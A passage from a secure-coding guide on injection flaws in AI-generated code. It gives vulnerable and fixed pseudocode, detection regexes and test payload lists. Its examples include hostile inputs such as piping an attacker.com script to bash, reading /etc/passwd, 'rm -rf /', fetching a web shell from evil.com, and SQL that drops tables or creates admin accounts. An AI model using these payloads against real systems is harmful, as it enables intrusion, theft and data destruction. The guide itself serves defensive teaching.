+regex: /(mysql|postgresql|mongodb|redis):\/\/[^:]+:[^@]+@/ + +// 5. 
Base64 encoded secrets (often JWT secrets) +regex: /["'][A-Za-z0-9+\/=]{40,}["']/ +``` + +### Manual Code Review Checklist + +| Check | What to Look For | +|-------|------------------| +| **Constants** | Any string constants in authentication/configuration code | +| **Config Objects** | Credential fields with non-placeholder values | +| **Connection Code** | Database connections, API clients with inline credentials | +| **Test Files** | Test credentials that might be real or become real | +| **CI/CD** | Pipeline configs, Docker files, deployment scripts | +| **Comments** | "TODO: move to env" comments with actual secrets | + +### Tools for Detection + +1. **git-secrets** - Prevents committing secrets to git +2. **truffleHog** - Scans git history for secrets +3. **GitGuardian** - SaaS secret detection +4. **gitleaks** - SAST tool for detecting secrets +5. **detect-secrets** - Yelp's secret detection tool + +--- + +## Security Checklist + +- [ ] No credentials, API keys, or secrets in source code +- [ ] No secrets in configuration files committed to version control +- [ ] `.gitignore` includes all secret file patterns (`.env`, `*.pem`, etc.) 
+- [ ] Pre-commit hooks prevent accidental secret commits +- [ ] Environment variables or secrets manager used for all credentials +- [ ] No secrets in CI/CD configuration files (use platform secrets) +- [ ] No secrets in Docker images or Dockerfile +- [ ] Logging sanitizes sensitive fields +- [ ] Error messages never include secrets +- [ ] No secrets in URL query parameters +- [ ] Test credentials are clearly fake and cannot work in production +- [ ] Secret scanning enabled in repository settings + +--- + +# Pattern 2: SQL Injection and Command Injection + +**CWE References:** CWE-89 (SQL Injection), CWE-77 (Command Injection), CWE-78 (OS Command Injection) + +**Priority Score:** 22/21 (SQL: Frequency 10, Severity 10, Detectability 4; Command: Frequency 8, Severity 10, Detectability 6) + +--- + +## Introduction: Why This Remains Prevalent in AI-Generated Code + +SQL injection and command injection are among the oldest known vulnerability classes, yet they continue to plague AI-generated code at alarming rates. Despite decades of secure coding education and well-established mitigation patterns, AI models persistently generate vulnerable code. + +**Why AI Models Generate Injection Vulnerabilities:** + +1. **Training Data Contamination:** Research shows that string-concatenated queries appear "thousands of times" in AI training data from GitHub repositories. The vulnerable pattern is statistically more common than the secure pattern in historical codebases. + +2. **Simplicity Bias:** String concatenation is syntactically simpler than parameterized queries. AI models optimize for generating "working code" and the concatenated approach requires fewer tokens and concepts. + +3. **Missing Adversarial Awareness:** AI models don't inherently think about how user input might be malicious. When asked to "query users by ID," the model focuses on the functional requirement, not the security implications. + +4. 
**Tutorial Code Prevalence:** Many tutorials and documentation examples show vulnerable patterns for brevity. AI learns that `f"SELECT * FROM users WHERE id = {id}"` is a valid pattern. + +5. **Context Limitation:** The AI cannot see your full application architecture, threat model, or data flow. It doesn't know which inputs come from untrusted sources. + +**Impact Statistics:** + +- **SQL Injection (CWE-89):** Ranked #2 in CWE Top 25 Most Dangerous Software Weaknesses (2025) +- **Command Injection (CWE-78):** Ranked #9 in CWE Top 25 (2025) +- **20% SQL Injection failure rate** across AI-generated tasks (Veracode 2025) +- **8 directly concatenated queries** found in a single testing session (Invicti Security) +- **CVE-2025-53773:** A real command injection vulnerability in GitHub Copilot code + +--- + +## SQL Injection: Multiple BAD Examples + +### BAD Example 1: String Concatenation in SELECT + +```pseudocode +// VULNERABLE: Direct string concatenation +function getUserById(userId): + query = "SELECT * FROM users WHERE id = " + userId + return database.execute(query) + +// Even worse with f-string/template literal +function getUserByEmail(email): + query = f"SELECT * FROM users WHERE email = '{email}'" + return database.execute(query) + +// Attack: email = "' OR '1'='1' --" +// Result: SELECT * FROM users WHERE email = '' OR '1'='1' --' +// Returns ALL users in the database +``` + +**Why This Is Dangerous:** +- Attacker controls the query structure, not just a value +- Can extract entire database contents +- Can bypass authentication with `' OR '1'='1` patterns +- Comments (`--`, `#`, `/**/`) can truncate remainder of query + +--- + +### BAD Example 2: Dynamic Table/Column Names + +```pseudocode +// VULNERABLE: User-controlled table name +function getDataFromTable(tableName, id): + query = f"SELECT * FROM {tableName} WHERE id = {id}" + return database.execute(query) + +// Attack: tableName = "users; DROP TABLE users; --" +// Result: SELECT * FROM users; DROP TABLE 
users; -- WHERE id = 1 + +// VULNERABLE: User-controlled column names +function sortUsers(sortColumn, sortOrder): + query = f"SELECT * FROM users ORDER BY {sortColumn} {sortOrder}" + return database.execute(query) + +// Attack: sortColumn = "(SELECT password FROM users WHERE is_admin=1)" +// Result: Data exfiltration through error messages or timing +``` + +**Why This Is Dangerous:** +- Parameterized queries cannot protect table/column names +- Enables schema manipulation attacks +- Can execute arbitrary SQL statements via stacking +- Attackers can extract data through subquery injection + +--- + +### BAD Example 3: ORDER BY Injection + +```pseudocode +// VULNERABLE: ORDER BY with user input +function getProductList(category, sortBy): + query = f"SELECT * FROM products WHERE category = ? ORDER BY {sortBy}" + return database.execute(query, [category]) + +// Attack: sortBy = "price, (CASE WHEN (SELECT password FROM users LIMIT 1) +// LIKE 'a%' THEN price ELSE name END)" +// Result: Boolean-based blind SQL injection + +// Attack: sortBy = "IF(1=1, price, name)" +// Result: Confirms SQL injection is possible +``` + +**Why This Is Dangerous:** +- Developers often parameterize WHERE but forget ORDER BY +- Cannot use standard parameterization for ORDER BY +- Enables blind SQL injection through conditional ordering +- Error-based extraction through invalid column references + +--- + +### BAD Example 4: LIKE Clause Injection + +```pseudocode +// VULNERABLE: Unescaped LIKE pattern +function searchProducts(searchTerm): + query = f"SELECT * FROM products WHERE name LIKE '%{searchTerm}%'" + return database.execute(query) + +// Attack: searchTerm = "%' UNION SELECT username, password, null FROM users --" +// Result: UNION-based data extraction + +// Even "safer" version has issues: +function searchProductsSafe(searchTerm): + query = "SELECT * FROM products WHERE name LIKE ?" 
+ return database.execute(query, [f"%{searchTerm}%"]) + +// Attack: searchTerm = "%" (matches everything - DoS through performance) +// Attack: searchTerm = "_" repeated (wildcard matching - info disclosure) +``` + +**Why This Is Dangerous:** +- LIKE patterns need double escaping (SQL + LIKE wildcards) +- `%` and `_` are valid in parameterized queries but dangerous in LIKE +- Performance-based DoS through expensive wildcard patterns +- Can probe for data existence through LIKE behavior + +--- + +### BAD Example 5: Batch/Stacked Query Injection + +```pseudocode +// VULNERABLE: Query that allows stacking +function updateUserEmail(userId, newEmail): + query = f"UPDATE users SET email = '{newEmail}' WHERE id = {userId}" + database.execute(query, multiStatement = true) + +// Attack: newEmail = "x'; INSERT INTO users (email, role) VALUES ('attacker@evil.com', 'admin'); --" +// Result: Creates new admin account + +// Attack: newEmail = "x'; UPDATE users SET password = 'hacked' WHERE role = 'admin'; --" +// Result: Mass password reset for all admins +``` + +**Why This Is Dangerous:** +- Some database drivers allow multiple statements by default +- Single injection point enables unlimited query execution +- Can create backdoor accounts, modify permissions, exfiltrate data +- Often missed because original query "succeeds" + +--- + +## Command Injection: Multiple BAD Examples + +### BAD Example 1: Shell Command Construction + +```pseudocode +// VULNERABLE: Direct command construction +function pingHost(hostname): + command = "ping -c 4 " + hostname + return shell.execute(command) + +// Attack: hostname = "127.0.0.1; cat /etc/passwd" +// Result: ping -c 4 127.0.0.1; cat /etc/passwd +// Executes both commands + +// VULNERABLE: Using shell=True with format strings +function checkDiskUsage(directory): + command = f"du -sh {directory}" + return subprocess.run(command, shell=True) + +// Attack: directory = "/tmp; rm -rf /" +// Result: Destructive command execution +``` + +**Why 
This Is Dangerous:** +- Shell metacharacters (`;`, `|`, `&`, `$()`, backticks) enable command chaining +- Attacker gains shell access on the server +- Can read sensitive files, install malware, pivot to other systems +- Shell=True interprets all special characters + +--- + +### BAD Example 2: Path Manipulation in Commands + +```pseudocode +// VULNERABLE: File path from user input +function convertImage(inputFile, outputFile): + command = f"convert {inputFile} -resize 800x600 {outputFile}" + return shell.execute(command) + +// Attack: inputFile = "image.jpg; curl attacker.com/shell.sh | bash" +// Result: Downloads and executes malware + +// Attack: inputFile = "$(cat /etc/passwd > /tmp/out.txt)image.jpg" +// Result: File exfiltration via command substitution + +// VULNERABLE: Filename in archiving +function createBackup(filename): + command = f"tar -czf backup.tar.gz {filename}" + return shell.execute(command) + +// Attack: filename = "--checkpoint=1 --checkpoint-action=exec=sh\ shell.sh" +// Result: tar option injection (GTFOBins-style attack) +``` + +**Why This Is Dangerous:** +- Paths often contain attacker-controlled portions (uploaded filenames) +- Command-line tools have dangerous flag behaviors (GTFOBins) +- Argument injection even without shell metacharacters +- `$(...)` and backticks execute subcommands + +--- + +### BAD Example 3: Argument Injection + +```pseudocode +// VULNERABLE: Arguments from user input +function fetchUrl(url): + command = f"curl {url}" + return shell.execute(command) + +// Attack: url = "-o /var/www/html/shell.php http://evil.com/shell.php" +// Result: Writes file to webserver (web shell) + +// Attack: url = "--config /etc/passwd" +// Result: Error message reveals file contents + +// VULNERABLE: Git commands with user input +function cloneRepository(repoUrl): + command = f"git clone {repoUrl}" + return shell.execute(command) + +// Attack: repoUrl = "--upload-pack='touch /tmp/pwned' git://evil.com/repo" +// Result: Arbitrary command 
execution via git options +``` + +**Why This Is Dangerous:** +- Programs interpret flags anywhere in argument list +- Can override intended behavior via injected flags +- `--` doesn't always prevent injection (depends on program) +- Many tools have "write file" or "execute" options + +--- + +### BAD Example 4: Environment Variable Injection + +```pseudocode +// VULNERABLE: User-controlled environment variable +function runWithCustomPath(command, customPath): + environment = {"PATH": customPath} + return subprocess.run(command, env=environment, shell=True) + +// Attack: customPath = "/tmp/evil:$PATH" +// If /tmp/evil contains malicious 'ls' binary, it executes instead + +// VULNERABLE: Library path manipulation +function loadPlugin(pluginPath): + environment = {"LD_PRELOAD": pluginPath} + return subprocess.run("target-app", env=environment) + +// Attack: pluginPath = "/tmp/evil.so" +// Result: Malicious shared library loaded, code execution +``` + +**Why This Is Dangerous:** +- Environment variables affect program behavior in unexpected ways +- PATH hijacking allows executing attacker binaries +- LD_PRELOAD/DYLD_INSERT_LIBRARIES enable library injection +- Some programs read secrets from environment (unintended exposure) + +--- + +## GOOD Examples: Proper Patterns + +### GOOD Example 1: Parameterized Queries (All Major DB Patterns) + +```pseudocode +// SECURE: Parameterized query - positional parameters +function getUserById(userId): + query = "SELECT * FROM users WHERE id = ?" 
+ return database.execute(query, [userId]) + +// SECURE: Named parameters +function getUserByEmailAndStatus(email, status): + query = "SELECT * FROM users WHERE email = :email AND status = :status" + return database.execute(query, {email: email, status: status}) + +// SECURE: Multiple value insertion +function createUser(name, email, role): + query = "INSERT INTO users (name, email, role) VALUES (?, ?, ?)" + return database.execute(query, [name, email, role]) + +// SECURE: IN clause with dynamic count +function getUsersByIds(userIds): + placeholders = ", ".join(["?" for _ in userIds]) + query = f"SELECT * FROM users WHERE id IN ({placeholders})" + return database.execute(query, userIds) + +// SECURE: Transaction with multiple parameterized queries +function transferFunds(fromId, toId, amount): + database.beginTransaction() + try: + database.execute("UPDATE accounts SET balance = balance - ? WHERE id = ?", [amount, fromId]) + database.execute("UPDATE accounts SET balance = balance + ? WHERE id = ?", [amount, toId]) + database.commit() + catch error: + database.rollback() + throw error +``` + +**Why This Is Secure:** +- Database driver separates query structure from data +- Parameters are never interpreted as SQL +- Works with all standard data types +- Prevents all SQL injection variants in value positions + +--- + +### GOOD Example 2: ORM Safe Usage + +```pseudocode +// SECURE: ORM with typed queries +function getUserById(userId): + return User.findOne({where: {id: userId}}) + +// SECURE: ORM with relationships +function getUserWithOrders(userId): + return User.findOne({ + where: {id: userId}, + include: [{model: Order, as: 'orders'}] + }) + +// SECURE: ORM query builder +function searchProducts(filters): + query = Product.query() + + if filters.category: + query = query.where('category', '=', filters.category) + if filters.minPrice: + query = query.where('price', '>=', filters.minPrice) + if filters.maxPrice: + query = query.where('price', '<=', filters.maxPrice) 
+ + return query.get() + +// WARNING: ORM raw query - still needs parameterization! +function customQuery(userId): + // STILL VULNERABLE if using string interpolation: + // return database.raw(f"SELECT * FROM users WHERE id = {userId}") + + // SECURE: Use ORM's parameterization + return database.raw("SELECT * FROM users WHERE id = ?", [userId]) +``` + +**Why This Is Secure:** +- ORM handles parameterization automatically +- Type checking prevents some injection attempts +- Query builders construct safe queries programmatically +- Still requires care with raw queries + +--- + +### GOOD Example 3: Safe Dynamic Table/Column Names (Allowlist) + +```pseudocode +// SECURE: Allowlist for table names +ALLOWED_TABLES = {"users", "products", "orders", "categories"} + +function getDataFromTable(tableName, id): + if tableName not in ALLOWED_TABLES: + throw ValidationError("Invalid table name") + + // Safe because tableName is from allowlist, not user input + query = f"SELECT * FROM {tableName} WHERE id = ?" + return database.execute(query, [id]) + +// SECURE: Allowlist for sort columns +SORT_COLUMNS = { + "name": "name", + "price": "price", + "date": "created_at", + "popularity": "view_count" +} + +function getProducts(sortBy, sortOrder): + column = SORT_COLUMNS.get(sortBy, "name") // Default to 'name' + direction = "DESC" if sortOrder == "desc" else "ASC" + + query = f"SELECT * FROM products ORDER BY {column} {direction}" + return database.execute(query) + +// SECURE: Quoted identifiers as additional defense +function getDataDynamic(tableName, columnName, value): + if tableName not in ALLOWED_TABLES: + throw ValidationError("Invalid table") + if columnName not in ALLOWED_COLUMNS[tableName]: + throw ValidationError("Invalid column") + + // Use database quoting function for identifiers + quotedTable = database.quoteIdentifier(tableName) + quotedColumn = database.quoteIdentifier(columnName) + + query = f"SELECT * FROM {quotedTable} WHERE {quotedColumn} = ?" 
+ return database.execute(query, [value]) +``` + +**Why This Is Secure:** +- Allowlist ensures only known-safe values used +- User input maps to predefined safe values +- Identifier quoting provides defense-in-depth +- Validation happens before query construction + +--- + +### GOOD Example 4: Safe Command Execution + +```pseudocode +// SECURE: Argument array (no shell interpretation) +function pingHost(hostname): + // Validate hostname format first + if not isValidHostname(hostname): + throw ValidationError("Invalid hostname format") + + // Use argument array - shell metacharacters are literal + result = subprocess.run( + ["ping", "-c", "4", hostname], + shell = false, // CRITICAL: no shell interpretation + capture_output = true, + timeout = 30 + ) + return result.stdout + +// SECURE: Allowlist for command arguments +ALLOWED_FORMATS = {"png", "jpg", "gif", "webp"} + +function convertImage(inputPath, outputPath, format): + // Validate format from allowlist + if format not in ALLOWED_FORMATS: + throw ValidationError("Invalid format") + + // Validate paths are within allowed directory + if not isPathWithinDirectory(inputPath, UPLOAD_DIR): + throw ValidationError("Invalid input path") + if not isPathWithinDirectory(outputPath, OUTPUT_DIR): + throw ValidationError("Invalid output path") + + // Safe argument array + result = subprocess.run( + ["convert", inputPath, "-resize", "800x600", f"{outputPath}.{format}"], + shell = false + ) + return result + +// SECURE: Using libraries instead of shell commands +function checkDiskUsage(directory): + // Use language-native library instead of shell + return filesystem.getDirectorySize(directory) + +function readJsonFile(filepath): + // Don't use: shell.execute(f"cat {filepath} | jq .") + // Use language JSON library + return json.parse(filesystem.readFile(filepath)) +``` + +**Why This Is Secure:** +- Argument arrays pass arguments directly to program +- No shell interpretation of metacharacters +- Allowlists prevent unexpected 
values +- Path validation prevents directory traversal +- Native libraries avoid shell entirely + +--- + +## Edge Cases Section + +### Edge Case 1: Second-Order Injection (Stored Then Executed) + +```pseudocode +// DANGEROUS: Data stored safely but used unsafely later + +// Step 1: User creates profile (looks safe) +function createProfile(userId, displayName): + // Parameterized - SAFE for initial storage + query = "INSERT INTO profiles (user_id, display_name) VALUES (?, ?)" + database.execute(query, [userId, displayName]) + // Attacker sets displayName = "admin'--" + +// Step 2: Background job uses stored data UNSAFELY +function generateReportForUser(userId): + // Get the stored display name + profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId]) + displayName = profile.display_name + // "admin'--" retrieved from database + + // VULNERABLE: Trusting data from database + reportQuery = f"INSERT INTO reports (title) VALUES ('Report for {displayName}')" + database.execute(reportQuery) + // Result: INSERT INTO reports (title) VALUES ('Report for admin'--') + +// SECURE: Parameterize ALL queries, even with "internal" data +function generateReportForUserSafe(userId): + profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId]) + + // Still parameterize even though data is from database + reportQuery = "INSERT INTO reports (title) VALUES (?)" + database.execute(reportQuery, [f"Report for {profile.display_name}"]) +``` + +**Detection:** Audit all code paths where database data is used in subsequent queries. 
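The second-order pattern above can be reproduced in a few lines. This is a minimal sketch using Python's standard `sqlite3` module in place of the pseudocode's `database` object. The table layout, function names, and payload are illustrative assumptions rather than anything from a real codebase. The payload closes the string literal and appends a second `VALUES` row, so the unsafe report job writes a row the application never intended.

```python
import sqlite3

# Hypothetical payload: closes the string literal and appends a second VALUES row.
PAYLOAD = "x'), ('forged row"


def make_db() -> sqlite3.Connection:
    """Create an in-memory database with the two tables from the pseudocode."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE profiles (user_id INTEGER PRIMARY KEY, display_name TEXT)")
    conn.execute("CREATE TABLE reports (title TEXT)")
    return conn


def create_profile(conn, user_id, display_name):
    # Step 1: parameterized insert, so the payload is stored verbatim.
    conn.execute(
        "INSERT INTO profiles (user_id, display_name) VALUES (?, ?)",
        (user_id, display_name),
    )


def load_display_name(conn, user_id):
    row = conn.execute(
        "SELECT display_name FROM profiles WHERE user_id = ?", (user_id,)
    ).fetchone()
    return row[0]


def generate_report_unsafe(conn, user_id):
    # Step 2 (VULNERABLE): stored data is interpolated into the SQL text.
    name = load_display_name(conn, user_id)
    conn.execute(f"INSERT INTO reports (title) VALUES ('Report for {name}')")


def generate_report_safe(conn, user_id):
    # Step 2 (SECURE): the stored value is bound as data, never parsed as SQL.
    name = load_display_name(conn, user_id)
    conn.execute("INSERT INTO reports (title) VALUES (?)", (f"Report for {name}",))


def report_titles(conn):
    return [row[0] for row in conn.execute("SELECT title FROM reports ORDER BY rowid")]


if __name__ == "__main__":
    for job in (generate_report_unsafe, generate_report_safe):
        conn = make_db()
        create_profile(conn, 1, PAYLOAD)
        job(conn, 1)
        print(job.__name__, report_titles(conn))
```

The unsafe job ends up with two report rows, one of them attacker-chosen, while the safe job stores a single title that contains the payload as plain text.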
+ +--- + +### Edge Case 2: Injection in Stored Procedures + +```pseudocode +// DANGEROUS: Dynamic SQL inside stored procedure + +// Stored Procedure Definition (in database) +CREATE PROCEDURE searchUsers(searchTerm VARCHAR(100)) +BEGIN + // VULNERABLE: Dynamic SQL construction + SET @query = CONCAT('SELECT * FROM users WHERE name LIKE ''%', searchTerm, '%'''); + PREPARE stmt FROM @query; + EXECUTE stmt; +END + +// Application code looks safe... +function searchUsers(term): + return database.callProcedure("searchUsers", [term]) + // But injection still occurs inside the procedure! + +// SECURE: Parameterized even in stored procedures +CREATE PROCEDURE searchUsersSafe(searchTerm VARCHAR(100)) +BEGIN + // Use parameterization within procedure + SELECT * FROM users WHERE name LIKE CONCAT('%', searchTerm, '%'); + // Or use prepared statement properly + SET @query = 'SELECT * FROM users WHERE name LIKE ?'; + SET @search = CONCAT('%', searchTerm, '%'); + PREPARE stmt FROM @query; + EXECUTE stmt USING @search; +END +``` + +**Detection:** Review all stored procedures for dynamic SQL construction. 
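As a starting point for that review, a rough heuristic can flag procedures whose `PREPARE` source variable is assembled with `CONCAT`. The sketch below is an assumption-laden illustration, not a complete detector: it only understands MySQL-style `SET @var = CONCAT(...)` followed by `PREPARE ... FROM @var`, and the function name `uses_concatenated_prepare` is hypothetical. Treat a hit as a prompt for manual review, and a miss as no guarantee of safety.

```python
import re

# Matches "PREPARE <stmt> FROM @<variable>" and captures the variable name.
PREPARE_RE = re.compile(r"\bPREPARE\s+\w+\s+FROM\s+@(\w+)", re.IGNORECASE)


def uses_concatenated_prepare(procedure_sql: str) -> bool:
    """Return True if a PREPARE source variable is assigned from CONCAT(...)."""
    for match in PREPARE_RE.finditer(procedure_sql):
        variable = re.escape(match.group(1))
        assignment = re.compile(
            rf"\bSET\s+@{variable}\s*=\s*CONCAT\s*\(", re.IGNORECASE
        )
        if assignment.search(procedure_sql):
            return True
    return False


# The two procedure bodies from the pseudocode above, as plain strings.
VULNERABLE_PROC = """
CREATE PROCEDURE searchUsers(searchTerm VARCHAR(100))
BEGIN
    SET @query = CONCAT('SELECT * FROM users WHERE name LIKE ''%', searchTerm, '%''');
    PREPARE stmt FROM @query;
    EXECUTE stmt;
END
"""

SAFE_PROC = """
CREATE PROCEDURE searchUsersSafe(searchTerm VARCHAR(100))
BEGIN
    SET @query = 'SELECT * FROM users WHERE name LIKE ?';
    SET @search = CONCAT('%', searchTerm, '%');
    PREPARE stmt FROM @query;
    EXECUTE stmt USING @search;
END
"""

if __name__ == "__main__":
    print("vulnerable flagged:", uses_concatenated_prepare(VULNERABLE_PROC))
    print("safe flagged:", uses_concatenated_prepare(SAFE_PROC))
```

The safe procedure still calls `CONCAT`, but only to build the bound value `@search`, which is why the check follows the variable named in `PREPARE` instead of matching `CONCAT` anywhere in the body.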
+ +--- + +### Edge Case 3: Injection Through Encoding Bypass + +```pseudocode +// DANGEROUS: Encoding-based bypass attempts + +// Scenario 1: Double-encoding bypass +function searchWithFilter(term): + // Application URL-decodes once + decoded = urlDecode(term) // %2527 -> %27 + + // WAF sees %27, not single quote + // Second decode happens: %27 -> ' + + query = f"SELECT * FROM items WHERE name = '{decoded}'" + // Injection succeeds + +// Scenario 2: Unicode normalization bypass +function filterUsername(username): + // Check for dangerous characters + if "'" in username or "\"" in username: + throw ValidationError("Invalid characters") + + // VULNERABLE: Unicode normalization happens AFTER validation + normalized = unicodeNormalize(username) + // 'ʼ' (U+02BC) might normalize to "'" (U+0027) in some systems + + query = f"SELECT * FROM users WHERE username = '{normalized}'" + +// SECURE: Parameterization makes encoding irrelevant +function searchSafe(term): + // Encoding doesn't matter - it's just data + query = "SELECT * FROM items WHERE name = ?" + return database.execute(query, [term]) + +// SECURE: Validate AFTER all normalization +function filterUsernameSafe(username): + // Normalize first + normalized = unicodeNormalize(username) + + // Then validate + if not isValidUsernameChars(normalized): + throw ValidationError("Invalid characters") + + // Then use (still with parameterization) + query = "SELECT * FROM users WHERE username = ?" + return database.execute(query, [normalized]) +``` + +**Detection:** Test with various encoded payloads (`%27`, `%2527`, Unicode variants). + +--- + +## Common Mistakes Section + +### Mistake 1: Thinking Escaping Is Enough + +```pseudocode +// DANGEROUS: Manual escaping is error-prone + +function getUserByNameEscaped(name): + // "Escaping" by replacing quotes + escapedName = name.replace("'", "''") + query = f"SELECT * FROM users WHERE name = '{escapedName}'" + return database.execute(query) + +// Problems with this approach: +// 1. 
Different databases have different escape rules +// 2. Multibyte character encoding bypasses (GBK, etc.) +// 3. Doesn't handle all injection vectors +// 4. Easy to forget in one place +// 5. Backslash escaping varies by database + +// Attack (MySQL with NO_BACKSLASH_ESCAPES off): +// name = "\' OR 1=1 --" +// Result: \'' OR 1=1 -- (backslash escapes first quote) + +// Attack (multibyte): name = 0xbf27 +// In GBK: 0xbf5c27 -> valid multibyte char + literal quote + +// ALWAYS USE PARAMETERIZATION - it's not about escaping +function getUserByNameSafe(name): + query = "SELECT * FROM users WHERE name = ?" + return database.execute(query, [name]) +``` + +**Key Insight:** Parameterization doesn't "escape" - it sends query structure and data separately. + +--- + +### Mistake 2: Trusting "Internal" Data Sources + +```pseudocode +// DANGEROUS: Trusting data because it's "internal" + +function processMessage(messageFromQueue): + // "This is from our internal queue, so it's safe" + userId = messageFromQueue.userId + + query = f"SELECT * FROM users WHERE id = {userId}" + return database.execute(query) + +// BUT: Where did that queue message originate? +// - User input that was serialized to queue +// - External API response stored in queue +// - Another service that has its own vulnerabilities + +// DANGEROUS: Trusting data from other tables/services +function getOrderDetails(orderId): + order = database.execute("SELECT * FROM orders WHERE id = ?", [orderId]) + + // Order.notes was user-supplied + query = f"SELECT * FROM notes WHERE content LIKE '%{order.notes}%'" + // Still vulnerable to second-order injection + +// SECURE: Parameterize ALL queries regardless of data source +function processMessageSafe(messageFromQueue): + query = "SELECT * FROM users WHERE id = ?" + return database.execute(query, [messageFromQueue.userId]) +``` + +**Rule:** Never trust ANY data in query construction - always parameterize. 
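The rule can be checked with a small runnable sketch. It assumes Python's standard `sqlite3` module stands in for the pseudocode's `database` object and that a queue message is a plain dict; the table contents and function names are hypothetical. The "internal" message carries a `userId` that was never validated upstream.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create an in-memory users table with two illustrative rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO users (id, name) VALUES (?, ?)", [(1, "alice"), (2, "bob")]
    )
    return conn


def process_message_unsafe(conn, message):
    # VULNERABLE: trusts the queue payload and interpolates it into SQL text.
    query = f"SELECT name FROM users WHERE id = {message['userId']} ORDER BY id"
    return conn.execute(query).fetchall()


def process_message_safe(conn, message):
    # SECURE: the payload is bound as a parameter, whatever its origin.
    query = "SELECT name FROM users WHERE id = ? ORDER BY id"
    return conn.execute(query, (message["userId"],)).fetchall()


# Hypothetical message whose userId originated from unvalidated user input.
MALICIOUS_MESSAGE = {"userId": "1 OR 1=1"}

if __name__ == "__main__":
    conn = make_db()
    print("unsafe:", process_message_unsafe(conn, MALICIOUS_MESSAGE))
    print("safe:  ", process_message_safe(conn, MALICIOUS_MESSAGE))
```

With the interpolated query the condition becomes `id = 1 OR 1=1` and every row comes back. With the bound parameter the whole string is compared to `id` as a single value, so nothing matches.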
+ +--- + +### Mistake 3: Partial Parameterization + +```pseudocode +// DANGEROUS: Parameterizing some parts but not others + +function searchUsers(name, sortColumn, limit): + // Parameterized the value, but not ORDER BY or LIMIT + query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortColumn} LIMIT {limit}" + return database.execute(query, [name]) + +// Attack: sortColumn = "1; DELETE FROM users; --" +// Attack: limit = "1 UNION SELECT password FROM admin_users" + +// DANGEROUS: Parameterized WHERE but not table +function getDataFlexible(tableName, filterColumn, filterValue): + query = f"SELECT * FROM {tableName} WHERE {filterColumn} = ?" + return database.execute(query, [filterValue]) + // Table name and column still injectable + +// SECURE: Validate/allowlist everything that can't be parameterized +function searchUsersSafe(name, sortColumn, limit): + // Allowlist for sort column + allowedSorts = {"name", "email", "created_at"} + sortCol = sortColumn if sortColumn in allowedSorts else "name" + + // Validate limit is positive integer + limitNum = min(max(int(limit), 1), 100) // Clamp to 1-100 + + query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortCol} LIMIT {limitNum}" + return database.execute(query, [name]) +``` + +**Key Insight:** Every injectable position needs either parameterization or allowlist validation. + +--- + +## Detection Hints and Testing Approaches + +### Automated Detection Patterns + +```pseudocode +// Regex patterns to find SQL injection vulnerabilities: + +// 1. String concatenation with SQL keywords +regex: /(SELECT|INSERT|UPDATE|DELETE|FROM|WHERE|ORDER BY).*(\+|\.concat|\$\{|f['"])/i + +// 2. Format strings with SQL +regex: /f["'].*\b(SELECT|INSERT|UPDATE|DELETE)\b.*\{.*\}/i + +// 3. String interpolation in queries +regex: /execute\s*\(\s*["`'].*\$\{?[a-zA-Z_]/ + +// Command injection patterns: + +// 4. 
Shell execution with concatenation +regex: /(system|exec|shell_exec|popen|subprocess\.run|os\.system)\s*\(.*(\+|\$\{|f['"])/ + +// 5. Shell=True with variables +regex: /shell\s*=\s*[Tt]rue.*\{|shell\s*=\s*[Tt]rue.*\+/ +``` + +### Manual Testing Approaches + +```pseudocode +// SQL Injection Test Payloads: + +basicTests = [ + "' OR '1'='1", // Basic auth bypass + "'; DROP TABLE test; --", // Stacked queries + "' UNION SELECT null--", // Union-based + "1 AND 1=1", // Boolean-based + "1' AND SLEEP(5)--", // Time-based blind +] + +// Command Injection Test Payloads: + +commandTests = [ + "; whoami", // Command chaining + "| id", // Pipe injection + "$(whoami)", // Command substitution + "`id`", // Backtick substitution + "& ping -c 4 attacker.com", // Background execution +] + +// Testing Methodology: +1. Identify all input points (forms, URLs, headers, JSON fields) +2. Trace input flow to database queries or shell commands +3. Inject test payloads at each point +4. Monitor for: + - SQL errors in response + - Time delays (for blind injection) + - DNS/HTTP callbacks (for out-of-band) + - Changed behavior indicating injection success +``` + +### Code Review Checklist + +| Check | What to Look For | +|-------|------------------| +| **Query Construction** | Any string concatenation or interpolation with query strings | +| **Dynamic Identifiers** | Table names, column names, ORDER BY from user input | +| **Raw Queries in ORM** | `.raw()`, `.execute()`, or similar with string building | +| **Shell Execution** | Any use of `system()`, `exec()`, `shell=True` | +| **Command Building** | String concatenation before command execution | +| **Input Sources** | Follow data from request to query/command | + +--- + +## Security Checklist + +- [ ] All SQL queries use parameterized statements or prepared queries +- [ ] ORM raw queries also use parameterization +- [ ] Dynamic table/column names validated against strict allowlist +- [ ] ORDER BY and LIMIT clauses use validated/allowlisted 
values +- [ ] No shell=True in subprocess calls +- [ ] All command-line arguments passed as arrays, not strings +- [ ] User-controlled file paths validated and sanitized +- [ ] Environment variables not set from user input +- [ ] Second-order injection considered (data from DB still parameterized) +- [ ] Stored procedures reviewed for internal dynamic SQL +- [ ] Input validation applied after all normalization/decoding, never before +- [ ] Code review specifically checks all query/command construction + +--- + +# Pattern 3: Cross-Site Scripting (XSS) + +**CWE References:** CWE-79 (Improper Neutralization of Input During Web Page Generation), CWE-80 (Basic XSS), CWE-83 (Improper Neutralization of Script in Attributes in a Web Page), CWE-87 (Improper Neutralization of Alternate XSS Syntax) + +**Priority Score:** 23 (Frequency: 10, Severity: 8, Detectability: 5) + +--- + +## Introduction: Why AI Often Misses Context-Specific Encoding + +Cross-Site Scripting (XSS) is one of the most prevalent vulnerabilities in AI-generated code. Research shows that **86% of AI-generated code fails XSS defenses** (Veracode 2025), and AI-generated code is **2.74x more likely to contain XSS** than human-written code (CodeRabbit analysis). + +**Why AI Models Generate XSS Vulnerabilities:** + +1. **Context-Blindness:** XSS prevention requires understanding the *context* where user input will be rendered: HTML body, attributes, JavaScript, CSS, or URLs. Each context requires different encoding. AI models frequently apply generic or no encoding because they lack awareness of rendering context. + +2. **Training Data Shows innerHTML Everywhere:** Tutorials and Stack Overflow answers heavily use `innerHTML`, `document.write()`, and template string injection for DOM manipulation. AI learns these as standard patterns. + +3. 
